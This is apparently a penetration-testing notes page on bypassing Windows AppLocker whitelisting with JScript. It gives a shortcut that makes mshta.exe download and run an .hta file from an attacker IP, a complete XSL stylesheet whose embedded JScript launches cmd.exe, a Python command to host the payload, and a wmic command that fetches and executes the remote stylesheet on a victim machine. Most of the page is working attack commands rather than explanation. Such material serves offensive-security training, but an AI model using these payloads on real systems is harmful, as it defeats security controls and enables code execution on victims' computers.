AppLocker Bypass with JScript

By sending a shortcut file to execute .hta embedded with .js

Note that mshta.exe will download the .hta file before its execution, so we must still bypass any installed endpoint detection software.

shortcut.lnk

mshta.exe http://192.168.119.120/test.hta

Jscript code generate with DotNetToJscript and embed it in the hta file

Window Script Host Jscript.js

See Jscript Shellcode Runner - DotNetToJscript

By Extensible Stylesheet Language (.xsl) through XLS transformation (XSLT)

This application whitelisting technique can also be leveraged through a shortcut file that we provide to the victim: .lnk mshta.exe http://192.168.119.120/test.xsl

test.xsl

<?xml version='1.0'?>
<stylesheet version="1.0"
xmlns="http://www.w3.org/1999/XSL/Transform"
xmlns:ms="urn:schemas-microsoft-com:xslt"
xmlns:user="http://mycompany.com/mynamespace">

<output method="text"/>
	<ms:script implements-prefix="user" language="JScript">
		<![CDATA[
			var r = new ActiveXObject("WScript.Shell");
			r.Run("cmd.exe");
		]]>
	</ms:script>
</stylesheet>

python -m http.server 80

dl & run transform to exec

wmic process get brief /format:"http://192.168.119.120/test.xsl"

PreviousAppLocker Bypass with C#NextMS SQL

Last updated 1 year ago

hashtagBy sending a shortcut file to execute .hta embedded with .js

hashtagBy Extensible Stylesheet Language (.xsl) through XLS transformation (XSLT)

By sending a shortcut file to execute .hta embedded with .js

By Extensible Stylesheet Language (.xsl) through XLS transformation (XSLT)